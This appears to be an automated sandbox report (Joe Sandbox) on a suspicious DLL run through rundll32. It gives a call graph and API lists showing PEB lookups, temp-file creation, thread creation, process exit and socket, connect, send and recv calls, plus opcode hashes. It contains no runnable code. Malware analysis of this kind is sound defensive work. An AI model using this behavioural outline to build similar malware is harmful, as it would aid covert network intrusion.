46614 7faf71d0 80 API calls 46613->46614 46615 7fb26098 46614->46615 46934 7fb3b1c0 46615->46934 46618 7faf72d0 26 API calls 46619 7fb260cf 46618->46619 46620 7fafa1a0 46619->46620 46621 7fafa1ca 46620->46621 46622 7fafa210 46620->46622 46623 7faf67d0 numpunct 26 API calls 46621->46623 46626 7fafa22c 46622->46626 46941 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46622->46941 46624 7fafa1d7 46623->46624 46939 7fb151c0 26 API calls 2 library calls 46624->46939 46626->45710 46626->45711 46628 7fafa1f0 46940 7fb41ac5 RaiseException 46628->46940 46630 7fafa201 46631 7fb120f0 std::ios_base::clear 11 API calls 46630->46631 46631->46622 46633 7fae45f9 46632->46633 46634 7fae463e 46633->46634 46942 7faf8760 81 API calls 2 library calls 46633->46942 46638 7fae4664 46634->46638 46640 7fae46b5 46634->46640 46636 7fae4627 46637 7fb13200 Concurrency::cancellation_token_source::~cancellation_token_source 80 API calls 46636->46637 46637->46634 46639 7faf67d0 numpunct 26 API calls 46638->46639 46641 7fae4670 46639->46641 46642 7faf67d0 numpunct 26 API calls 46640->46642 46943 7faea920 81 API calls 46641->46943 46644 7fae46c9 46642->46644 46944 7fae4850 26 API calls std::ios_base::clear 46644->46944 46645 7fae4696 46647 7fb120f0 std::ios_base::clear 11 API calls 46645->46647 46649 7fae46ad 46647->46649 46648 7fae46eb 46945 7fb158b0 26 API calls 2 library calls 46648->46945 46649->45730 46651 7fae4710 46946 7fb41ac5 RaiseException 46651->46946 46653 7fae4724 46654 7fb120f0 std::ios_base::clear 11 API calls 46653->46654 46655 7fae4730 46654->46655 46656 7fb120f0 std::ios_base::clear 11 API calls 46655->46656 46656->46649 46658 7fb239f6 46657->46658 46947 7faf77a0 46658->46947 46660 7fb23a1a 46950 7faf78f0 46660->46950 46662 7fb23a65 _Ptr_base 46663 7fb23aaa 46662->46663 46664 7fb23a8c 46662->46664 46957 7fb23b50 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46663->46957 46956 7fb23b50 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46664->46956 46667 7fb23aa8 std::ios_base::clear 46668 7fb120f0 std::ios_base::clear 11 API calls 46667->46668 46669 7fb23b05 _Ptr_base 46668->46669 46670 7fb120f0 std::ios_base::clear 11 API calls 46669->46670 46671 7fb23b31 46670->46671 46671->45739 46673 7fb25eee 46672->46673 47017 7fb133f0 46673->47017 46677 7fae48ec numpunct 46676->46677 46678 7fae4931 46677->46678 47024 7fb123f0 15 API calls numpunct 46677->47024 47020 7faf6df0 46678->47020 46681 7fae49ab 46682 7faf9e20 46681->46682 46683 7faf9e3c 46682->46683 46685 7faf9e37 std::ios_base::clear 46682->46685 46684 7fb120f0 std::ios_base::clear 11 API calls 46683->46684 46684->46685 46685->45771 46687 7fb343b2 _fwprintf_s 46686->46687 47026 7faf70d0 46687->47026 46691 7fb343f6 46692 7fb34492 GetPEB 46691->46692 46693 7fb344f9 46692->46693 46694 7fb34740 GetPEB 46693->46694 46695 7fb347a7 46694->46695 46696 7faf70d0 71 API calls 46695->46696 46697 7fb349dd 46696->46697 47041 7fae3db0 46697->47041 46702 7fae3db0 26 API calls 46703 7fb34a36 46702->46703 46704 7fae3db0 26 API calls 46703->46704 46705 7fb34a3f 46704->46705 46706 7fae3db0 26 API calls 46705->46706 46707 7fb34a7a 46706->46707 46708 7fae3db0 26 API calls 46707->46708 46709 7fb34a83 46708->46709 46710 7fae3db0 26 API calls 46709->46710 46711 7fb34ac2 46710->46711 46712 7fae3d30 26 API calls 46711->46712 46713 7fb34acb 46712->46713 46714 7fae3db0 26 API calls 46713->46714 46715 7fb34ad4 46714->46715 46716 7fae3db0 26 API calls 46715->46716 46717 7fb34b3d 46716->46717 46718 7faf9f90 59 API calls 46717->46718 46719 7fb34b47 46718->46719 46720 7fae3db0 26 API calls 46719->46720 46721 7fb34b4d 46720->46721 46722 7fae3db0 26 API calls 46721->46722 46723 7fb34ba6 46722->46723 46724 7fae3db0 26 API calls 46723->46724 46725 7fb34baf 46724->46725 46726 7fae3db0 26 API calls 46725->46726 46727 7fb34c2d 46726->46727 46728 7fae3db0 26 API calls 46727->46728 46729 7fb34c36 46728->46729 46730 7fae3db0 26 API calls 46729->46730 46731 7fb34c3f 46730->46731 46732 7fae3d30 26 API calls 46731->46732 46733 7fb34c52 46732->46733 47053 7fb3ba00 46733->47053 46736 7fb34cda 46737 7fb3501e GetPEB 46736->46737 46738 7fb34f0c 46736->46738 46747 7fb35097 socket 46737->46747 46738->46738 46739 7fae5360 numpunct 26 API calls 46738->46739 46740 7fb34f9f 46739->46740 46742 7fb120f0 std::ios_base::clear 11 API calls 46740->46742 46744 7fb34fbb 46742->46744 46743 7fb353e8 std::ios_base::clear 46745 7fb353f0 GetPEB 46743->46745 47059 7faf9300 11 API calls 46744->47059 46764 7fb35445 gethostbyname 46745->46764 46747->46743 46749 7fb352d6 46747->46749 46748 7fb34fca 47060 7faf9300 11 API calls 46748->47060 46749->46749 46750 7fae5360 numpunct 26 API calls 46749->46750 46752 7fb35369 46750->46752 46754 7fb120f0 std::ios_base::clear 11 API calls 46752->46754 46753 7fb34fe4 46759 7fb120f0 std::ios_base::clear 11 API calls 46753->46759 46756 7fb35385 46754->46756 47061 7faf9300 11 API calls 46756->47061 46758 7fb3578a GetPEB 46781 7fb357e7 46758->46781 46761 7fb34ffb 46759->46761 46760 7fb35394 47062 7faf9300 11 API calls 46760->47062 46762 7fb120f0 std::ios_base::clear 11 API calls 46761->46762 46765 7fb35007 46762->46765 46763 7fb35678 46763->46763 46769 7fae5360 numpunct 26 API calls 46763->46769 46764->46758 46764->46763 46767 7fb120f0 std::ios_base::clear 11 API calls 46765->46767 46770 7fb35016 46767->46770 46768 7fb353ae 46773 7fb120f0 std::ios_base::clear 11 API calls 46768->46773 46771 7fb3570b 46769->46771 46770->45791 46772 7fb120f0 std::ios_base::clear 11 API calls 46771->46772 46774 7fb35727 46772->46774 46775 7fb353c5 46773->46775 47063 7faf9300 11 API calls 46774->47063 46777 7fb120f0 std::ios_base::clear 11 API calls 46775->46777 46779 7fb353d1 46777->46779 46778 7fb35736 47064 7faf9300 11 API calls 46778->47064 46780 7fb120f0 std::ios_base::clear 11 API calls 46779->46780 46780->46770 46783 7fae5360 numpunct 26 API calls 46781->46783 46786 7fb35a9a std::ios_base::clear 46783->46786 46784 7fb35750 46785 7fb120f0 std::ios_base::clear 11 API calls 46784->46785 46787 7fb35767 46785->46787 46788 7fb35ac8 GetPEB 46786->46788 46789 7fb120f0 std::ios_base::clear 11 API calls 46787->46789 46792 7fb35b1c GetPEB 46788->46792 46790 7fb35773 46789->46790 46791 7fb120f0 std::ios_base::clear 11 API calls 46790->46791 46791->46770 46794 7fb35d93 GetPEB 46792->46794 46799 7fb36029 connect 46794->46799 46797 7fb36384 std::ios_base::clear 46798 7fb363b1 GetPEB 46797->46798 46809 7fb36426 send 46798->46809 46799->46797 46800 7fb36263 46799->46800 46800->46800 46801 7fae5360 numpunct 26 API calls 46800->46801 46802 7fb362f6 46801->46802 46803 7fb120f0 std::ios_base::clear 11 API calls 46802->46803 46804 7fb36312 46803->46804 46806 7fb120f0 std::ios_base::clear 11 API calls 46804->46806 46807 7fb36321 46806->46807 47065 7faf9300 11 API calls 46807->47065 46810 7fb3676a 46809->46810 46812 7fb36658 46809->46812 46810->46810 46813 7fae5360 numpunct 26 API calls 46810->46813 46811 7fb36330 47066 7faf9300 11 API calls 46811->47066 46812->46812 46814 7fae5360 numpunct 26 API calls 46812->46814 46849 7fb367e4 std::ios_base::clear 46813->46849 46816 7fb366dc 46814->46816 46818 7fb120f0 std::ios_base::clear 11 API calls 46816->46818 46817 7fb3634a 46825 7fb120f0 std::ios_base::clear 11 API calls 46817->46825 46821 7fb366f8 46818->46821 46819 7fb36cf8 46823 7fb36e31 GetPEB 46819->46823 46824 7fb373fd GetPEB 46819->46824 46820 7fb367fc GetPEB 46820->46849 46822 7fb120f0 std::ios_base::clear 11 API calls 46821->46822 46826 7fb36707 46822->46826 46838 7fb36e71 GetPEB 46823->46838 46837 7fb3743c GetPEB 46824->46837 46828 7fb36361 46825->46828 47067 7faf9300 11 API calls 46826->47067 46830 7fb120f0 std::ios_base::clear 11 API calls 46828->46830 46829 7fb36716 47068 7faf9300 11 API calls 46829->47068 46831 7fb3636d 46830->46831 46832 7fb120f0 std::ios_base::clear 11 API calls 46831->46832 46832->46770 46833 7fb36a7e recv 46835 7fb36ab5 GetPEB 46833->46835 46833->46849 46835->46849 46836 7fb36730 46841 7fb120f0 std::ios_base::clear 11 API calls 46836->46841 46850 7fb37693 46837->46850 46851 7fb370b6 46838->46851 46842 7fb36747 46841->46842 46844 7fb120f0 std::ios_base::clear 11 API calls 46842->46844 46843 7fae5360 numpunct 26 API calls 46843->46849 46845 7fb36753 46844->46845 46847 7fb120f0 std::ios_base::clear 11 API calls 46845->46847 46847->46770 46849->46819 46849->46820 46849->46833 46849->46843 46852 7fb120f0 11 API calls std::ios_base::clear 46849->46852 47069 7faf65a0 26 API calls numpunct 46849->47069 47070 7fb13000 26 API calls std::ios_base::clear 46849->47070 47073 7faf65a0 26 API calls numpunct 46850->47073 46853 7fae5360 numpunct 26 API calls 46851->46853 46852->46849 46854 7fb37360 46853->46854 46856 7fb120f0 std::ios_base::clear 11 API calls 46854->46856 46858 7fb3737c 46856->46858 46857 7fb37904 46859 7fb120f0 std::ios_base::clear 11 API calls 46857->46859 46860 7fb120f0 std::ios_base::clear 11 API calls 46858->46860 46861 7fb37925 46859->46861 46862 7fb3738b 46860->46862 46863 7fb120f0 std::ios_base::clear 11 API calls 46861->46863 46864 7fb120f0 std::ios_base::clear 11 API calls 46862->46864 46865 7fb37934 46863->46865 46866 7fb3739a 46864->46866 46868 7fb120f0 std::ios_base::clear 11 API calls 46865->46868 47071 7faf9300 11 API calls 46866->47071 46869 7fb37943 46868->46869 47074 7faf9300 11 API calls 46869->47074 46870 7fb373a9 47072 7faf9300 11 API calls 46870->47072 46872 7fb37952 47075 7faf9300 11 API calls 46872->47075 46874 7fb373c3 46877 7fb120f0 std::ios_base::clear 11 API calls 46874->46877 46876 7fb3796c std::ios_base::_Ios_base_dtor 46879 7fb120f0 std::ios_base::clear 11 API calls 46876->46879 46878 7fb373da 46877->46878 46880 7fb120f0 std::ios_base::clear 11 API calls 46878->46880 46881 7fb379af 46879->46881 46882 7fb373e6 46880->46882 46883 7fb120f0 std::ios_base::clear 11 API calls 46881->46883 46884 7fb120f0 std::ios_base::clear 11 API calls 46882->46884 46885 7fb379bb 46883->46885 46884->46770 46886 7fb120f0 std::ios_base::clear 11 API calls 46885->46886 46886->46770 46887->45718 46888->45726 46890 7faed21d 46889->46890 47188 7faed0c0 46890->47188 46892 7faed240 std::ios_base::clear 46893 7fb120f0 std::ios_base::clear 11 API calls 46892->46893 46894 7faed267 46893->46894 46895 7fb15a00 46894->46895 46896 7faf63a0 std::ios_base::clear 26 API calls 46895->46896 46897 7fb15a59 46896->46897 47207 7fb325d0 46897->47207 46900 7faf63a0 std::ios_base::clear 26 API calls 46901 7fb15a76 46900->46901 47211 7fb379e0 46901->47211 46904 7fb120f0 std::ios_base::clear 11 API calls 46905 7fb15a9a 46904->46905 46906 7fb120f0 std::ios_base::clear 11 API calls 46905->46906 46907 7fb15aa9 46906->46907 46907->45732 46908->45749 46909->45748 46910->45775 46911->45794 46912->45816 46913->45847 46914->45878 46915->45889 46916->45868 46917->45838 46918->45808 46920 7faf7243 46919->46920 46922 7faf7257 46919->46922 46932 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46920->46932 46923 7fb3b0e0 46922->46923 46924 7fb3b0f1 46923->46924 46926 7fb136d0 46923->46926 46933 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46924->46933 46927 7faf72d0 46926->46927 46928 7faf67d0 numpunct 26 API calls 46927->46928 46929 7faf7339 46928->46929 46930 7faf67d0 numpunct 26 API calls 46929->46930 46931 7faf7349 46930->46931 46931->46613 46932->46922 46933->46926 46935 7fb3b1d1 46934->46935 46937 7fb260a0 46934->46937 46938 7fb4f35d 80 API calls Concurrency::cancellation_token_source::~cancellation_token_source 46935->46938 46937->46618 46938->46937 46939->46628 46940->46630 46941->46626 46942->46636 46943->46645 46944->46648 46945->46651 46946->46653 46958 7faf20e0 46947->46958 46949 7faf77bd _Ptr_base 46949->46660 46951 7faf7977 _memcpy_s 46950->46951 46961 7fb4ebec 46951->46961 46953 7faf797f _memcpy_s 46966 7faf6740 46953->46966 46955 7faf7a15 _Ptr_base 46955->46662 46956->46667 46957->46667 46959 7fb407db std::_Facet_Register 3 API calls 46958->46959 46960 7faf20f4 _Ptr_base 46959->46960 46960->46949 46969 7fb51eec GetLastError 46961->46969 46963 7fb4ebf7 46995 7fb53d59 46963->46995 47009 7fae5590 46966->47009 46968 7faf67ac 46968->46955 46970 7fb51f02 46969->46970 46971 7fb51f08 46969->46971 46999 7fb5432d 6 API calls __dosmaperr 46970->46999 46975 7fb51f0c 46971->46975 47000 7fb5436c 6 API calls __dosmaperr 46971->47000 46974 7fb51f24 46974->46975 46976 7fb51f2c 46974->46976 46977 7fb51f91 SetLastError 46975->46977 47001 7fb53b8e 14 API calls 2 library calls 46976->47001 46980 7fb51f9c 46977->46980 46979 7fb51f39 46981 7fb51f41 46979->46981 46982 7fb51f52 46979->46982 46980->46963 47002 7fb5436c 6 API calls __dosmaperr 46981->47002 47003 7fb5436c 6 API calls __dosmaperr 46982->47003 46985 7fb51f5e 46986 7fb51f62 46985->46986 46987 7fb51f79 46985->46987 47004 7fb5436c 6 API calls __dosmaperr 46986->47004 47006 7fb51cee 14 API calls __dosmaperr 46987->47006 46991 7fb51f4f 47005 7fb53beb 14 API calls __dosmaperr 46991->47005 46992 7fb51f76 46992->46977 46993 7fb51f84 47007 7fb53beb 14 API calls __dosmaperr 46993->47007 46996 7fb4ec07 46995->46996 46997 7fb53d6c 46995->46997 46996->46953 46997->46996 47008 7fb58e72 16 API calls 4 library calls 46997->47008 46999->46971 47000->46974 47001->46979 47002->46991 47003->46985 47004->46991 47005->46992 47006->46993 47007->46992 47008->46996 47010 7fae55a7 numpunct 47009->47010 47012 7fae55b1 numpunct 47010->47012 47015 7fb123f0 15 API calls numpunct 47010->47015 47014 7fae55ca _memcpy_s 47012->47014 47016 7fae49f0 14 API calls 2 library calls 47012->47016 47014->46968 47015->47012 47016->47014 47018 7fb12420 3 API calls 47017->47018 47019 7fb13449 47018->47019 47019->45754 47021 7faf6f19 ctype 47020->47021 47022 7faf6e86 numpunct 47020->47022 47021->46681 47025 7fae49f0 14 API calls 2 library calls 47022->47025 47024->46678 47025->47021 47027 7faf70fb 47026->47027 47076 7faf5b40 47027->47076 47032 7faf9f90 47169 7faf8aa0 47032->47169 47036 7fb14ee0 std::ios_base::clear 26 API calls 47037 7fafa172 47036->47037 47173 7faf9c00 47037->47173 47040 7fafa027 std::ios_base::_Ios_base_dtor 47040->47036 47043 7fae3dee 47041->47043 47042 7faf8aa0 26 API calls 47047 7fae3eff 47042->47047 47043->47042 47044 7fb14ee0 std::ios_base::clear 26 API calls 47045 7fae421f 47044->47045 47046 7faf9c00 26 API calls 47045->47046 47048 7fae423a 47046->47048 47047->47044 47049 7fae3d30 47048->47049 47050 7fae3d54 47049->47050 47180 7fae9220 47050->47180 47054 7fb3ba34 47053->47054 47055 7fb3ba5d std::ios_base::clear 47054->47055 47056 7fb13290 26 API calls 47054->47056 47057 7fb120f0 std::ios_base::clear 11 API calls 47055->47057 47056->47055 47058 7fb34c67 GetPEB 47057->47058 47058->46736 47059->46748 47060->46753 47061->46760 47062->46768 47063->46778 47064->46784 47065->46811 47066->46817 47067->46829 47068->46836 47069->46849 47070->46849 47071->46870 47072->46874 47073->46857 47074->46872 47075->46876 47078 7faf5b6b 47076->47078 47085 7faf5c40 47078->47085 47082 7faf7040 47163 7faf6220 47082->47163 47084 7faf7051 47084->47032 47088 7faf5c6b 47085->47088 47093 7fb2f7a0 47088->47093 47089 7faf6130 47090 7faf615b 47089->47090 47091 7faf5beb 47090->47091 47162 7fb402ad 9 API calls 2 library calls 47090->47162 47091->47082 47102 7fb10410 47093->47102 47097 7fb2f813 47098 7faf5bd3 47097->47098 47121 7fb402ad 9 API calls 2 library calls 47097->47121 47098->47089 47099 7fb2f7ce 47099->47097 47113 7fb14ee0 47099->47113 47103 7fb14ee0 std::ios_base::clear 26 API calls 47102->47103 47104 7fb10492 47103->47104 47105 7fb407db std::_Facet_Register 3 API calls 47104->47105 47106 7fb10499 47105->47106 47108 7fb104b3 47106->47108 47122 7fb3fda4 36 API calls 6 library calls 47106->47122 47109 7fb3c1d0 47108->47109 47110 7fb3c20d 47109->47110 47123 7faf56a0 47110->47123 47112 7fb3c229 std::ios_base::_Ios_base_dtor 47112->47099 47114 7fb14f09 47113->47114 47115 7fb14f6c 47113->47115 47117 7fb14f1a std::ios_base::clear 47114->47117 47159 7fb41ac5 RaiseException 47114->47159 47115->47097 47160 7faf83f0 26 API calls 2 library calls 47117->47160 47119 7fb14f5e 47161 7fb41ac5 RaiseException 47119->47161 47121->47098 47122->47108 47137 7fb3f98c 47123->47137 47127 7faf56e5 47136 7faf5707 47127->47136 47156 7fb0fba0 69 API calls 2 library calls 47127->47156 47129 7faf57c0 47129->47112 47131 7faf571f 47132 7faf572e 47131->47132 47133 7faf5727 47131->47133 47158 7fb3fd72 RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 47132->47158 47157 7fb11a90 RaiseException std::ios_base::clear Concurrency::cancel_current_task 47133->47157 47149 7fb3f9e4 47136->47149 47138 7fb3f9a2 47137->47138 47139 7fb3f99b 47137->47139 47140 7faf56cc 47138->47140 47142 7fb40410 std::_Lockit::_Lockit EnterCriticalSection 47138->47142 47141 7fb4f48f std::_Lockit::_Lockit 6 API calls 47139->47141 47143 7fafaa20 47140->47143 47141->47140 47142->47140 47144 7fafaa65 47143->47144 47145 7fafaa31 47143->47145 47144->47127 47146 7fb3f98c std::_Lockit::_Lockit 7 API calls 47145->47146 47147 7fafaa3b 47146->47147 47148 7fb3f9e4 std::_Lockit::~_Lockit LeaveCriticalSection LeaveCriticalSection 47147->47148 47148->47144 47150 7fb4f49d 47149->47150 47151 7fb3f9ee 47149->47151 47152 7fb4f478 std::_Lockit::~_Lockit LeaveCriticalSection 47150->47152 47153 7fb4041e std::_Lockit::~_Lockit LeaveCriticalSection 47151->47153 47155 7fb3fa01 47151->47155 47154 7fb4f4a4 47152->47154 47153->47155 47154->47129 47155->47129 47156->47131 47157->47136 47158->47136 47159->47117 47160->47119 47161->47115 47162->47091 47164 7fb407db std::_Facet_Register 3 API calls 47163->47164 47165 7faf62c6 47164->47165 47167 7faf62e0 47165->47167 47168 7fb3fda4 36 API calls 6 library calls 47165->47168 47167->47084 47168->47167 47170 7faf8aeb 47169->47170 47172 7faf8b3a 47170->47172 47178 7fb28500 26 API calls std::ios_base::clear 47170->47178 47172->47040 47177 7faf57e0 59 API calls 5 library calls 47172->47177 47174 7faf9c23 47173->47174 47176 7faf9c4c 47174->47176 47179 7fb116e0 26 API calls std::ios_base::clear 47174->47179 47176->46691 47177->47040 47178->47172 47179->47176 47181 7fae9278 47180->47181 47182 7faf8aa0 26 API calls 47181->47182 47183 7fae92f8 47182->47183 47184 7fb14ee0 std::ios_base::clear 26 API calls 47183->47184 47185 7fae95db 47184->47185 47186 7faf9c00 26 API calls 47185->47186 47187 7fae3d9d 47186->47187 47187->46702 47189 7faed0e3 47188->47189 47190 7faed186 47189->47190 47191 7faf67d0 numpunct 26 API calls 47189->47191 47193 7faf9e80 26 API calls 47190->47193 47192 7faed116 47191->47192 47204 7fae4850 26 API calls std::ios_base::clear 47192->47204 47195 7faed1d6 47193->47195 47195->46892 47196 7faed138 47205 7fb158b0 26 API calls 2 library calls 47196->47205 47198 7faed15a 47206 7fb41ac5 RaiseException 47198->47206 47200 7faed16b 47201 7fb120f0 std::ios_base::clear 11 API calls 47200->47201 47202 7faed177 47201->47202 47203 7fb120f0 std::ios_base::clear 11 API calls 47202->47203 47203->47190 47204->47196 47205->47198 47206->47200 47209 7fb325e3 47207->47209 47208 7fb120f0 std::ios_base::clear 11 API calls 47210 7fb15a61 47208->47210 47209->47208 47210->46900 47212 7fb37a2b 47211->47212 47213 7faf67d0 numpunct 26 API calls 47212->47213 47214 7fb37b4e 47213->47214 47215 7fb120f0 std::ios_base::clear 11 API calls 47214->47215 47216 7fb15a82 47215->47216 47216->46904 47217 7fb50bb3 47232 7fb58674 47217->47232 47219 7fb50bc4 47236 7fb5898f GetEnvironmentStringsW 47219->47236 47222 7fb50bcf 47258 7fb53beb 14 API calls __dosmaperr 47222->47258 47223 7fb50bdb 47259 7fb50c0c 25 API calls 4 library calls 47223->47259 47226 7fb50bd5 47227 7fb50be2 47260 7fb53beb 14 API calls __dosmaperr 47227->47260 47229 7fb50bff 47261 7fb53beb 14 API calls __dosmaperr 47229->47261 47231 7fb50c05 47233 7fb5867d 47232->47233 47234 7fb586a0 47232->47234 47262 7fb51fa7 14 API calls 2 library calls 47233->47262 47234->47219 47237 7fb589a7 47236->47237 47238 7fb50bc9 47236->47238 47263 7fb5772f WideCharToMultiByte 47237->47263 47238->47222 47238->47223 47240 7fb589c4 47241 7fb589ce FreeEnvironmentStringsW 47240->47241 47242 7fb589d9 47240->47242 47241->47238 47264 7fb54dab 15 API calls 2 library calls 47242->47264 47244 7fb589e0 47245 7fb589f9 47244->47245 47246 7fb589e8 47244->47246 47266 7fb5772f WideCharToMultiByte 47245->47266 47265 7fb53beb 14 API calls __dosmaperr 47246->47265 47249 7fb58a09 47252 7fb58a10 47249->47252 47253 7fb58a18 47249->47253 47250 7fb589ed FreeEnvironmentStringsW 47251 7fb58a2a 47250->47251 47251->47238 47267 7fb53beb 14 API calls __dosmaperr 47252->47267 47268 7fb53beb 14 API calls __dosmaperr 47253->47268 47256 7fb58a16 FreeEnvironmentStringsW 47256->47251 47258->47226 47259->47227 47260->47229 47261->47231 47262->47234 47263->47240 47264->47244 47265->47250 47266->47249 47267->47256 47268->47256 47269 7fb3d7a5 47270 7fb3d7d2 __DllMainCRTStartup@12 47269->47270 47271 7fb13740 9 API calls 47270->47271 47272 7fb3d7f0 47271->47272 47273 7fb3e44b 47272->47273 47276 7fb3d7f8 __DllMainCRTStartup@12 47272->47276 47274 7fb3e45f swprintf 47273->47274 47275 7fb28840 3 API calls 47273->47275 47277 7fb3e5e3 lstrlenW 47274->47277 47279 7fb3e441 47274->47279 47275->47274 47278 7fb3d8cb GetTempFileNameW 47276->47278 47277->47274 47281 7fb3d94e GetCurrentDirectoryA 47278->47281 47282 7fb3da30 47281->47282 47282->47279 47283 7fb3db93 GetTempFileNameA 47282->47283 47285 7fb3dbf7 __DllMainCRTStartup@12 swprintf 47283->47285 47284 7fb3de9e GetPEB 47286 7fb3df01 47284->47286 47285->47284 47287 7fb077a0 3 API calls 47286->47287 47288 7fb3e11e 47287->47288 47289 7fb3e125 ExitProcess 47288->47289 47290 7fb3e12d GetPEB 47288->47290 47294 7fb3e1e8 CreateThread 47290->47294 47292 7faf1e40 GetPEB 47293 7fb3e42c 47292->47293 47296 7faf20b0 GetPEB 47293->47296 47294->47292 47297 7fb09830 282 API calls 4 library calls 47294->47297 47296->47279 47298 7fb3d039 47299 7fb3d04f 47298->47299 47300 7fb28840 3 API calls 47299->47300 47301 7fb3e441 __DllMainCRTStartup@12 47299->47301 47305 7fb3d293 __DllMainCRTStartup@12 47300->47305 47302 7fb13740 9 API calls 47303 7fb3d7f0 47302->47303 47304 7fb3e44b 47303->47304 47307 7fb3d7f8 __DllMainCRTStartup@12 47303->47307 47306 7fb28840 3 API calls 47304->47306 47310 7fb3e45f swprintf 47304->47310 47305->47301 47305->47302 47306->47310 47309 7fb3d8cb GetTempFileNameW 47307->47309 47308 7fb3e5e3 lstrlenW 47308->47310 47312 7fb3d94e GetCurrentDirectoryA 47309->47312 47310->47301 47310->47308 47313 7fb3da30 47312->47313 47313->47301 47314 7fb3db93 GetTempFileNameA 47313->47314 47315 7fb3dbf7 __DllMainCRTStartup@12 swprintf 47314->47315 47316 7fb3de9e GetPEB 47315->47316 47317 7fb3df01 47316->47317 47318 7fb077a0 3 API calls 47317->47318 47319 7fb3e11e 47318->47319 47320 7fb3e125 ExitProcess 47319->47320 47321 7fb3e12d GetPEB 47319->47321 47325 7fb3e1e8 CreateThread 47321->47325 47323 7faf1e40 GetPEB 47324 7fb3e42c 47323->47324 47327 7faf20b0 GetPEB 47324->47327 47325->47323 47328 7fb09830 282 API calls 4 library calls 47325->47328 47327->47301
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Navigation to non-$-$MNo name attribute $TMP$TMP$The server or prox
                                                                  • API String ID: 0-3937262799
                                                                  • Opcode ID: c266e44c254b3f0fb0d2de8dd727685e7826a30440be8aaa474ff270f9de1b31
                                                                  • Instruction ID: 8f9896e944cfdcef941054aa544f8c87669499f5ebeaf7b4234915cf1d8c4e24
                                                                  • Opcode Fuzzy Hash: c266e44c254b3f0fb0d2de8dd727685e7826a30440be8aaa474ff270f9de1b31
                                                                  • Instruction Fuzzy Hash: 49E21579D04228CBDB25CF6AD890BEDBBF1FF48314F64819AD449A7244E734AA85CF50
                                                                  APIs
                                                                  • IsCharLowerA.USER32(00000073), ref: 7FB09A60
                                                                  • GetTempPathW.KERNEL32(00000104,?,?), ref: 7FB0A0C7
                                                                  • GetEnvironmentVariableW.KERNEL32(PATH,00000000,00000000,00000000,00000000,B8A6976E,00000000), ref: 7FB0A36C
                                                                    • Part of subcall function 7FB17680: std::exception::exception.LIBCMTD ref: 7FB176B0
                                                                  • Sleep.KERNEL32(?), ref: 7FB0D30E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CharEnvironmentLowerPathSleepTempVariablestd::exception::exception
                                                                  • String ID: 9mD$MNo name attribute $PATH$u${$~
                                                                  • API String ID: 1510289414-1868743812
                                                                  • Opcode ID: 46a61bc7d31d9ae8c9472b729acce6de7c8af5f3ce0fab051300243a453fa79c
                                                                  • Instruction ID: bba76ceac6c67c1ee7ec9f42ec97e1851d31c28eb8ca239c542bd2db7916fb88
                                                                  • Opcode Fuzzy Hash: 46a61bc7d31d9ae8c9472b729acce6de7c8af5f3ce0fab051300243a453fa79c
                                                                  • Instruction Fuzzy Hash: 66835AB5D04358DBDB20EB78CE45BDDBBB4AB89200F5082DDE409A7255EB345B84CF92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2$MNo name attribute $Q$\$advapi32$c$Operation
                                                                  • API String ID: 0-301690894
                                                                  • Opcode ID: aded5803b1c8553ba9ac6502099cfe595cffde60b5277ddd63fbcacf40439267
                                                                  • Instruction ID: a6c379df77c34bbcd1b777308389d41f813037f0a8840fb8a669eec4e871d166
                                                                  • Opcode Fuzzy Hash: aded5803b1c8553ba9ac6502099cfe595cffde60b5277ddd63fbcacf40439267
                                                                  • Instruction Fuzzy Hash: D3E2F078E05269CFDB25CF69C890BEDBBB1BB49304F2481DAD449A7345E730AA85CF50
                                                                  APIs
                                                                    • Part of subcall function 7FAE3DB0: std::ios_base::clear.LIBCPMTD ref: 7FAE421A
                                                                  • socket.WS2_32(?,?,?), ref: 7FB352C3
                                                                  • gethostbyname.WS2_32(?), ref: 7FB3565F
                                                                  • connect.WS2_32(?,?,?), ref: 7FB36255
                                                                  • send.WS2_32(?,?,?,?), ref: 7FB36649
                                                                  • recv.WS2_32(?,?,?,?), ref: 7FB36AA2
                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 7FB3799B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.3322816455.000000007FAE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FAE0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7fae0000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Ios_base_dtorconnectgethostbynamerecvsendsocketstd::ios_base::_std::ios_base::clear
                                                                  • String ID: -P
                                                                  • API String ID: 3660264722-3391753047
                                                                  • Opcode ID: 198c0cd9f92143eebb9ed2feee8f55da724fc2da5b6287abc81f4ed215c83ddc
                                                                  • Instruction ID: 00751919c38b07e8cd2aec935c0024d1a088cedc2d605292f9dffbd55a765344
                                                                  • Opcode Fuzzy Hash: 198c0cd9f92143eebb9ed2feee8f55da724fc2da5b6287abc81f4ed215c83ddc
                                                                  • Instruction Fuzzy Hash: 7773ACB4E052698FDB65CF18C990BD9BBB2EF89304F1081DAD849A7355DB30AE85CF40
